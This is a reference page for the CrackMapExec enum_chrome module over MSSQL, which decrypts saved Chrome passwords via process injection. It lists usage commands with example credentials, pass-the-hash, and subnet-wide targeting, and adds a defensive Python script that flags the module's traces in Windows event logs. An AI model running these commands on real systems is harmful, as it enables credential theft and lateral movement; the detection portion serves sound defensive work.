CrackMapExec Enum_chrome (mssql)
This page contains detailed information about how to use the enum_chrome CME module with the mssql protocol. For a list of all CrackMapExec modules, visit the CrackMapExec Module Library.
Description
This module executes the Get-ChromeDump.ps1 PowerShell script to decrypt saved Chrome credentials, secrets and passwords. It uses process injection (Invoke-PSInject.ps1) to execute the script.
The enum_chrome module is OPSEC unsafe, which means that it may touch the disk and can therefore trigger an alarm.
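From a detection standpoint, the behaviour described above leaves two kinds of traces: the script names in PowerShell script block logs, and a shell started by the SQL Server process. The Python sketch below is an added example, not code from CrackMapExec or from the original page. Its events are constructed, and it assumes script block logging (event 4104) and process-creation auditing (event 4688) are enabled and that the mssql protocol runs commands through xp_cmdshell.

```python
# Added example: triage constructed Windows events for traces of enum_chrome over MSSQL.
SCRIPT_MARKERS = ("get-chromedump", "invoke-psinject")  # script names from this page
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed sample events. 4104 = PowerShell script block log, 4688 = process creation.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "SQL01",
     "ParentProcessName": r"D:\MSSQL\Binn\sqlservr.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4104, "Computer": "SQL01",
     "ScriptBlockText": "function Invoke-PSInject { <constructed placeholder> }"},
    {"EventID": 4104, "Computer": "WS07",
     "ScriptBlockText": "Import-Module .\\Get-ChromeDump.ps1"},
    {"EventID": 4688, "Computer": "SQL02",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "NewProcessName": r"D:\MSSQL\Binn\sqlservr.exe"},
    {"EventID": 4104, "Computer": "SQL02", "ScriptBlockText": "Get-ChildItem C:\\Backups"},
]

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return a finding label for one event, or None if it is not of interest."""
    if event.get("EventID") == 4104:
        text = event.get("ScriptBlockText", "").lower()
        hits = [m for m in SCRIPT_MARKERS if m in text]
        return "script-block:" + ",".join(hits) if hits else None
    if event.get("EventID") == 4688:
        child = basename(event.get("NewProcessName", ""))
        # Assumption: the command arrives through xp_cmdshell, so SQL Server is the parent.
        if basename(event.get("ParentProcessName", "")) == "sqlservr.exe" and child in SHELLS:
            return "sqlservr-spawned-shell:" + child
    return None

def triage(events):
    """Group findings per host; both signal kinds on one host raise the severity."""
    per_host = {}
    for event in events:
        label = classify(event)
        if label:
            per_host.setdefault(event.get("Computer", "unknown"), set()).add(label)
    return {host: {"severity": "high" if len({l.split(":")[0] for l in labels}) == 2 else "review",
                   "labels": sorted(labels)}
            for host, labels in per_host.items()}

if __name__ == "__main__":
    for host, result in triage(SAMPLE_EVENTS).items():
        print(host, result)
```

A name match alone is easy to evade by renaming the scripts, so the sqlservr.exe parent check is the more durable of the two signals.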
Supported Protocols
- mssql
- smb
Module Source Code
Authors
Module Usage
This is how to use the enum_chrome module while using the mssql protocol:
Syntax:
# cme mssql <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M enum_chrome
Admin user:
# cme mssql 10.0.5.1 -u sa -p P@ss123 -d . -M enum_chrome
# cme mssql 10.0.5.1 -u sa -p P@ss123 --local-auth -M enum_chrome
Normal user:
# cme mssql 10.0.5.1 -u dbuser -p P@ss123 -d target.corp -M enum_chrome
CrackMapExec also supports passing the hash, so you can specify an NTLM hash instead of a password:
# cme mssql 10.0.5.1 -u sa -H 432b022dc22aa5afe884e986b8383ff2 -d . -M enum_chrome
# cme mssql 10.0.5.1 -u dbuser -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M enum_chrome
Multiple targets can be given as a file, a CIDR range or an IP range:
# cme mssql target_list.txt -u sa -p P@ss123 -d . -M enum_chrome
# cme mssql 10.0.5.0/24 -u sa -p P@ss123 -d . -M enum_chrome
# cme mssql 10.0.5.1-100 -u sa -p P@ss123 -d . -M enum_chrome
Module Options
As you can see below, the enum_chrome module doesn't have any additional options:
# cme mssql -M enum_chrome --options
[*] enum_chrome module options:
References
- https://github.com/xorrior/RandomPS-Scripts/blob/master/Get-ChromeDump.ps1
- https://github.com/EmpireProject/PSInject/blob/master/Invoke-PSInject.ps1
Version
This page has been created based on CrackMapExec version 5.1.7dev.